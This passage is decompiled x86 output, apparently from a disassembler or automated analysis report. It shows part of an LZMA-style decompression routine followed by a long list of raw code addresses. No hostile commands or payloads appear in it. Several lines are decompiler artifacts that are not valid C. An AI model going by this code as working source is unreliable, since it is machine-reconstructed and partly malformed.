                                                                                    							}
                                                                                    							__ecx = __ebx;
                                                                                    							__eax = __ebx;
                                                                                    							__ecx = __ebx >> 1;
                                                                                    							__eax = __ebx & 0x00000001;
                                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                                    							__al = __al | 0x00000002;
                                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                                    							__eflags = __ebx - 0xe;
                                                                                    							_v48 = __eax;
                                                                                    							if(__ebx >= 0xe) {
                                                                                    								__ebx = 0;
                                                                                    								_v76 = __ecx;
                                                                                    								L105:
                                                                                    								__eflags = _v76;
                                                                                    								if(_v76 <= 0) {
                                                                                    									__eax = __eax + __ebx;
                                                                                    									_v68 = 4;
                                                                                    									_v48 = __eax;
                                                                                    									__eax = _v8;
                                                                                    									__eax = _v8 + 0x644;
                                                                                    									__eflags = __eax;
                                                                                    									L111:
                                                                                    									__ebx = 0;
                                                                                    									_v92 = __eax;
                                                                                    									_v84 = 1;
                                                                                    									_v72 = 0;
                                                                                    									_v76 = 0;
                                                                                    									L115:
                                                                                    									__eax = _v68;
                                                                                    									__eflags = _v76 - _v68;
                                                                                    									if(_v76 >= _v68) {
                                                                                    										_t397 =  &_v48;
                                                                                    										 *_t397 = _v48 + __ebx;
                                                                                    										__eflags =  *_t397;
                                                                                    										goto L122;
                                                                                    									}
                                                                                    									__eax = _v84;
                                                                                    									_v20 = _v20 >> 0xb;
                                                                                    									__edi = _v84 + _v84;
                                                                                    									__eax = _v92;
                                                                                    									__esi = __edi + __eax;
                                                                                    									_v88 = __esi;
                                                                                    									__ax =  *__esi;
                                                                                    									__ecx = __ax & 0x0000ffff;
                                                                                    									__edx = (_v20 >> 0xb) * __ecx;
                                                                                    									__eflags = _v16 - __edx;
                                                                                    									if(_v16 >= __edx) {
                                                                                    										__ecx = 0;
                                                                                    										_v20 = _v20 - __edx;
                                                                                    										__ecx = 1;
                                                                                    										_v16 = _v16 - __edx;
                                                                                    										__ebx = 1;
                                                                                    										__ecx = _v76;
                                                                                    										__ebx = 1 << __cl;
                                                                                    										__ecx = 1 << __cl;
                                                                                    										__ebx = _v72;
                                                                                    										__ebx = _v72 | __ecx;
                                                                                    										__cx = __ax;
                                                                                    										__cx = __ax >> 5;
                                                                                    										__eax = __eax - __ecx;
                                                                                    										__edi = __edi + 1;
                                                                                    										__eflags = __edi;
                                                                                    										_v72 = __ebx;
                                                                                    										 *__esi = __ax;
                                                                                    										_v84 = __edi;
                                                                                    									} else {
                                                                                    										_v20 = __edx;
                                                                                    										0x800 = 0x800 - __ecx;
                                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    										_v84 = _v84 << 1;
                                                                                    										 *__esi = __dx;
                                                                                    									}
                                                                                    									__eflags = _v20 - 0x1000000;
                                                                                    									if(_v20 >= 0x1000000) {
                                                                                    										L114:
                                                                                    										_t374 =  &_v76;
                                                                                    										 *_t374 = _v76 + 1;
                                                                                    										__eflags =  *_t374;
                                                                                    										goto L115;
                                                                                    									} else {
                                                                                    										goto L112;
                                                                                    									}
                                                                                    								}
                                                                                    								__ecx = _v16;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								_v20 = _v20 >> 1;
                                                                                    								__eflags = _v16 - _v20;
                                                                                    								_v72 = __ebx;
                                                                                    								if(_v16 >= _v20) {
                                                                                    									__ecx = _v20;
                                                                                    									_v16 = _v16 - _v20;
                                                                                    									__ebx = __ebx | 0x00000001;
                                                                                    									__eflags = __ebx;
                                                                                    									_v72 = __ebx;
                                                                                    								}
                                                                                    								__eflags = _v20 - 0x1000000;
                                                                                    								if(_v20 >= 0x1000000) {
                                                                                    									L104:
                                                                                    									_t344 =  &_v76;
                                                                                    									 *_t344 = _v76 - 1;
                                                                                    									__eflags =  *_t344;
                                                                                    									goto L105;
                                                                                    								} else {
                                                                                    									goto L102;
                                                                                    								}
                                                                                    							}
                                                                                    							__edx = _v8;
                                                                                    							__eax = __eax - __ebx;
                                                                                    							_v68 = __ecx;
                                                                                    							__eax = _v8 + 0x55e + __eax * 2;
                                                                                    							goto L111;
                                                                                    						case 0x1a:
                                                                                    							L58:
                                                                                    							__eflags = _v104;
                                                                                    							if(_v104 == 0) {
                                                                                    								_v140 = 0x1a;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v108;
                                                                                    							__al = _v96;
                                                                                    							__edx = _v12;
                                                                                    							_v100 = _v100 + 1;
                                                                                    							_v108 = _v108 + 1;
                                                                                    							_v104 = _v104 - 1;
                                                                                    							 *_v108 = __al;
                                                                                    							__ecx = _v24;
                                                                                    							 *(_v12 + __ecx) = __al;
                                                                                    							__eax = __ecx + 1;
                                                                                    							__edx = 0;
                                                                                    							_t197 = __eax % _v120;
                                                                                    							__eax = __eax / _v120;
                                                                                    							__edx = _t197;
                                                                                    							goto L82;
                                                                                    						case 0x1b:
                                                                                    							L78:
                                                                                    							__eflags = _v104;
                                                                                    							if(_v104 == 0) {
                                                                                    								_v140 = 0x1b;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__eax = _v24;
                                                                                    							__eax = _v24 - _v48;
                                                                                    							__eflags = __eax - _v120;
                                                                                    							if(__eax >= _v120) {
                                                                                    								__eax = __eax + _v120;
                                                                                    								__eflags = __eax;
                                                                                    							}
                                                                                    							__edx = _v12;
                                                                                    							__cl =  *(__edx + __eax);
                                                                                    							__eax = _v24;
                                                                                    							_v96 = __cl;
                                                                                    							 *(__edx + __eax) = __cl;
                                                                                    							__eax = __eax + 1;
                                                                                    							__edx = 0;
                                                                                    							_t280 = __eax % _v120;
                                                                                    							__eax = __eax / _v120;
                                                                                    							__edx = _t280;
                                                                                    							__eax = _v108;
                                                                                    							_v100 = _v100 + 1;
                                                                                    							_v108 = _v108 + 1;
                                                                                    							_t289 =  &_v104;
                                                                                    							 *_t289 = _v104 - 1;
                                                                                    							__eflags =  *_t289;
                                                                                    							 *_v108 = __cl;
                                                                                    							L82:
                                                                                    							_v24 = __edx;
                                                                                    							goto L83;
                                                                                    						case 0x1c:
                                                                                    							while(1) {
                                                                                    								L126:
                                                                                    								__eflags = _v104;
                                                                                    								if(_v104 == 0) {
                                                                                    									break;
                                                                                    								}
                                                                                    								__eax = _v24;
                                                                                    								__eax = _v24 - _v48;
                                                                                    								__eflags = __eax - _v120;
                                                                                    								if(__eax >= _v120) {
                                                                                    									__eax = __eax + _v120;
                                                                                    									__eflags = __eax;
                                                                                    								}
                                                                                    								__edx = _v12;
                                                                                    								__cl =  *(__edx + __eax);
                                                                                    								__eax = _v24;
                                                                                    								_v96 = __cl;
                                                                                    								 *(__edx + __eax) = __cl;
                                                                                    								__eax = __eax + 1;
                                                                                    								__edx = 0;
                                                                                    								_t420 = __eax % _v120;
                                                                                    								__eax = __eax / _v120;
                                                                                    								__edx = _t420;
                                                                                    								__eax = _v108;
                                                                                    								_v108 = _v108 + 1;
                                                                                    								_v104 = _v104 - 1;
                                                                                    								_v52 = _v52 - 1;
                                                                                    								__eflags = _v52;
                                                                                    								 *_v108 = __cl;
                                                                                    								_v24 = _t420;
                                                                                    								if(_v52 > 0) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									L83:
                                                                                    									_v140 = 2;
                                                                                    									goto L3;
                                                                                    								}
                                                                                    							}
                                                                                    							_v140 = 0x1c;
                                                                                    							L173:
                                                                                    							_push(0x22);
                                                                                    							_pop(_t574);
                                                                                    							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                    							return 0;
                                                                                    					}
                                                                                    				}
                                                                                    				L174:
                                                                                    				_t538 = _t537 | 0xffffffff;
                                                                                    				return _t538;
                                                                                    			}










































                                                                                    0x00406bc0
                                                                                    0x00406bc7
                                                                                    0x00406bcd
                                                                                    0x00406bd3
                                                                                    0x00000000
                                                                                    0x00406bd7
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bf9
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c0e
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c59
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c5e
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c76
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406ccd
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd2
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cef
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d35
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073dd
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x00407413
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743b
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406dcf
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
